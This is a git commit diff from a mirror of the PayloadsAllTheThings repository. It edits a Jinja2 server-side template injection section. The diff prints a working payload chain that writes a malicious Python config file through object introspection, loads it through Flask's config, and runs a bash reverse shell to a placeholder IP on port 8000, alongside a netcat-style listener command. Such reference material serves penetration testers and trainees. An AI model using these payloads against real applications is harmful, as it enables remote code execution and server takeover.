mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add Template injections + Jinja template injection
parent
76b15d575e
commit
bb98bd9339
@ -53,7 +53,7 @@ nv -lnvp 8000
|
||||
Inject this template
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
|
||||
{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config
|
||||
{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
|
||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||
```
|
||||
|
||||
@ -61,4 +61,4 @@ Inject this template
|
||||
[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
|
||||
#### Training
|
||||
[https://w3challs.com/](https://w3challs.com/)
|
||||
[https://w3challs.com/](https://w3challs.com/)
|
||||
|